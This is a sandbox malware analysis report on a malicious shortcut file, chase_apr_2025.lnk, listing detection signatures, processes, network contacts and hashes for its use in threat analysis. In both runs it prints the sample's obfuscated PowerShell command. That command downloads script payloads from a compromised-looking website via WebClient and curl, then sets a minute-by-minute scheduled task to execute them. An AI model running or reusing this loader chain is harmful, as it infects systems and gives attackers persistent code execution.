Malware Analysis Report

2025-05-05 23:31

Sample ID 250418-wd4tystls6
Target chase_apr_2025.lnk
SHA256 09ef17dc4284a8d1a8b937354bd8137aa9c0d98bffb897bd891ccff854484e43
Tags
execution
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

09ef17dc4284a8d1a8b937354bd8137aa9c0d98bffb897bd891ccff854484e43

Threat Level: Likely malicious

The file chase_apr_2025.lnk was found to be: Likely malicious.

Malicious Activity Summary

execution

Blocklisted process makes network request

Checks computer location settings

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-04-18 17:49

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-04-18 17:49

Reported

2025-04-18 17:50

Platform

win10v2004-20250410-en

Max time kernel

41s

Max time network

40s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\chase_apr_2025.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2645532622-3298555945-705856666-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\chase_apr_2025.lnk

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $affl = $env:programdata + '\' + ('2qr3mg7cssz4nr.js yxliyx19s'); $getf='D'+'ow'+'nl'+'oadF'+'ile'; $t670luhhb7i6w = New-Object Net.WebClient; $wscs = 'wscript '; $t670luhhb7i6w.$getf('https://rietiholidays.it/wp-content/uploads/2021/06/unprojectingsJX.php', '2qr3mg7cssz4nr.js'); . ('cu'+'rl.e'+'xe') -s -o zqd1lm17ezgl 'https://rietiholidays.it/wp-content/uploads/2021/06/covalencesxjiY.php'; mv zqd1lm17ezgl 'yxliyx19s.js'; . ('sc'+'hta'+'s'+'ks') /create /sc minute /mo 1 /f /tr ($wscs + $affl) /tn yxliyx19s;

C:\Windows\system32\curl.exe

"C:\Windows\system32\curl.exe" -s -o zqd1lm17ezgl https://rietiholidays.it/wp-content/uploads/2021/06/covalencesxjiY.php

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\ProgramData\2qr3mg7cssz4nr.js yxliyx19s" /tn yxliyx19s

C:\Windows\system32\wscript.EXE

C:\Windows\system32\wscript.EXE C:\ProgramData\2qr3mg7cssz4nr.js yxliyx19s

Network

Country Destination Domain Proto
US 8.8.8.8:53 rietiholidays.it udp
IT 185.81.1.167:443 rietiholidays.it tcp
US 8.8.8.8:53 www.rietiholidays.it udp
IT 185.81.1.167:443 www.rietiholidays.it tcp
IT 185.81.1.167:443 www.rietiholidays.it tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.22.144.149:80 r10.o.lencr.org tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

memory/4204-2-0x00007FFB4BFC3000-0x00007FFB4BFC5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pk4kxzrp.xao.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4204-12-0x000002257AC20000-0x000002257AC42000-memory.dmp

memory/4204-13-0x00007FFB4BFC0000-0x00007FFB4CA81000-memory.dmp

memory/4204-14-0x00007FFB4BFC0000-0x00007FFB4CA81000-memory.dmp

memory/4204-15-0x00007FFB4BFC0000-0x00007FFB4CA81000-memory.dmp

C:\ProgramData\zqd1lm17ezgl

MD5 6f2c98b320a97239e18b95658d60ac75
SHA1 19b01f664642846c84e02cf0c07a61d4bf8785cd
SHA256 7729e82cf6e68f42e11257e678e08e28e3dd3597033bed67f206e04623c8d166
SHA512 c65cedea9760d2dc9fc150ba1a3303f212295984fbaebe718a81acf498090893a07201f5cc6e05af27597d2e826d482fce2ff546285e25a90780ad1675daa500

memory/4204-20-0x00007FFB4BFC0000-0x00007FFB4CA81000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-04-18 17:49

Reported

2025-04-18 17:50

Platform

win11-20250410-en

Max time kernel

36s

Max time network

4s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\chase_apr_2025.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\chase_apr_2025.lnk

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $affl = $env:programdata + '\' + ('2qr3mg7cssz4nr.js yxliyx19s'); $getf='D'+'ow'+'nl'+'oadF'+'ile'; $t670luhhb7i6w = New-Object Net.WebClient; $wscs = 'wscript '; $t670luhhb7i6w.$getf('https://rietiholidays.it/wp-content/uploads/2021/06/unprojectingsJX.php', '2qr3mg7cssz4nr.js'); . ('cu'+'rl.e'+'xe') -s -o zqd1lm17ezgl 'https://rietiholidays.it/wp-content/uploads/2021/06/covalencesxjiY.php'; mv zqd1lm17ezgl 'yxliyx19s.js'; . ('sc'+'hta'+'s'+'ks') /create /sc minute /mo 1 /f /tr ($wscs + $affl) /tn yxliyx19s;

C:\Windows\system32\curl.exe

"C:\Windows\system32\curl.exe" -s -o zqd1lm17ezgl https://rietiholidays.it/wp-content/uploads/2021/06/covalencesxjiY.php

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\ProgramData\2qr3mg7cssz4nr.js yxliyx19s" /tn yxliyx19s

C:\Windows\system32\wscript.EXE

C:\Windows\system32\wscript.EXE C:\ProgramData\2qr3mg7cssz4nr.js yxliyx19s

Network

Country Destination Domain Proto
US 8.8.8.8:53 rietiholidays.it udp
IT 185.81.1.167:443 www.rietiholidays.it tcp
IT 185.81.1.167:443 www.rietiholidays.it tcp
IT 185.81.1.167:443 www.rietiholidays.it tcp
GB 2.22.144.142:80 r10.o.lencr.org tcp
N/A 127.0.0.1:59468 tcp

Files

memory/2168-2-0x00007FF8A8853000-0x00007FF8A8855000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f0bguvcx.nlb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2168-11-0x0000025352440000-0x0000025352462000-memory.dmp

memory/2168-12-0x00007FF8A8850000-0x00007FF8A9312000-memory.dmp

memory/2168-13-0x00007FF8A8850000-0x00007FF8A9312000-memory.dmp

memory/2168-14-0x00007FF8A8850000-0x00007FF8A9312000-memory.dmp

C:\ProgramData\zqd1lm17ezgl

MD5 6f2c98b320a97239e18b95658d60ac75
SHA1 19b01f664642846c84e02cf0c07a61d4bf8785cd
SHA256 7729e82cf6e68f42e11257e678e08e28e3dd3597033bed67f206e04623c8d166
SHA512 c65cedea9760d2dc9fc150ba1a3303f212295984fbaebe718a81acf498090893a07201f5cc6e05af27597d2e826d482fce2ff546285e25a90780ad1675daa500

memory/2168-19-0x00007FF8A8850000-0x00007FF8A9312000-memory.dmp